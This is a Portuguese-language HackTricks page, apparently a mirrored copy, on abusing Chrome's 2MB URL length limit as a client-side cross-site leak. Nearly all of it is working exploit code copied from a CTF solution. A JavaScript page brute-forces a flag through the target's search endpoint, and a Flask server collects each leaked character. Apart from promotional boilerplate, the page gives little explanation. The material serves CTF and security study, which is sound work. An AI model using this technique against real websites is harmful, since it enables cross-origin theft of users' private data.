mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-23 03:23:44 +00:00
91 lines
4.9 KiB
Markdown
91 lines
4.9 KiB
Markdown
# Comprimento Máximo de URL - Lado do Cliente
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
Código copiado de [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
|
|
```html
|
|
<html>
|
|
<body></body>
|
|
<script>
|
|
(async () => {
|
|
|
|
const curr = "http://secrets.wtl.pw/search?query=HackTM{"
|
|
|
|
const leak = async (char) => {
|
|
|
|
fetch("/?try=" + char)
|
|
let w = window.open(curr + char + "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2))
|
|
|
|
const check = async () => {
|
|
try {
|
|
w.origin
|
|
} catch {
|
|
fetch("/?nope=" + char)
|
|
return
|
|
}
|
|
setTimeout(check, 100)
|
|
}
|
|
check()
|
|
}
|
|
|
|
const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
|
|
|
|
for (let i = 0; i < CHARSET.length; i++) {
|
|
leak(CHARSET[i])
|
|
await new Promise(resolve => setTimeout(resolve, 50))
|
|
}
|
|
})()
|
|
</script>
|
|
</html>
|
|
```
|
|
Lado do servidor:
|
|
```python
|
|
from flask import Flask, request
|
|
|
|
app = Flask(__name__)
|
|
|
|
CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
|
|
chars = []
|
|
|
|
@app.route('/', methods=['GET'])
|
|
def index():
|
|
global chars
|
|
|
|
nope = request.args.get('nope', '')
|
|
if nope:
|
|
chars.append(nope)
|
|
|
|
remaining = [c for c in CHARSET if c not in chars]
|
|
|
|
print("Remaining: {}".format(remaining))
|
|
|
|
return "OK"
|
|
|
|
@app.route('/exploit.html', methods=['GET'])
|
|
def exploit():
|
|
return open('exploit.html', 'r').read()
|
|
|
|
if __name__ == '__main__':
|
|
app.run(host='0.0.0.0', port=1337)
|
|
```
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe suas técnicas de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e para o** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|